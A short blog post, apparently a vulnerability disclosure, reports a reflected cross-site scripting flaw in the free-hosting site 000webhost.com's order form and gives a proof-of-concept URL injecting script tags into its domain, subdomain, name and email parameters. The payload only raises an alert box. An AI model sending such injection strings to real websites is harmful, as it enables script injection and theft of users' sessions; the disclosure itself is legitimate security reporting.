One of the Top free web hosting provider, 000WebHost website is found to be vulnerable to Cross site scripting . The vulnerability was discovered by the Cyber Security Researcher Vedachala.
Domain name,Subdomain name and email address field in "Order Free Web Hosting" page of the site (000webhost.com) are vulnerable to xss injection.
The web app developer of this site fails to validate those inputs for the special characters that results in this security flaw.
POC code for this security bug:
http://www.000webhost.com/order.php?domain=\"><script>alert(/XSS - Hacking Tricks Master/)</script>&subdomain=\"><script>alert(/XSS - Hacking Tricks Master/)</scrip&name=\"><script>alert(/XSS - Hacking Tricks Master/)</script>&email=\"><script>alert(/XSS - Hacking Tricks Master/)</script>&pass1=\"><script>alert(/E Hacking New&pass2=\"><script>alert(/E Hacking New&aggree=yes&error_multiple=1&error_domain=1&error_subdomain=1&error_name=&error_email=1&error_pass=4&error_tos=&error_number=&error_js=&error_disposable=&error_bad_gmail=
No comments:
Post a Comment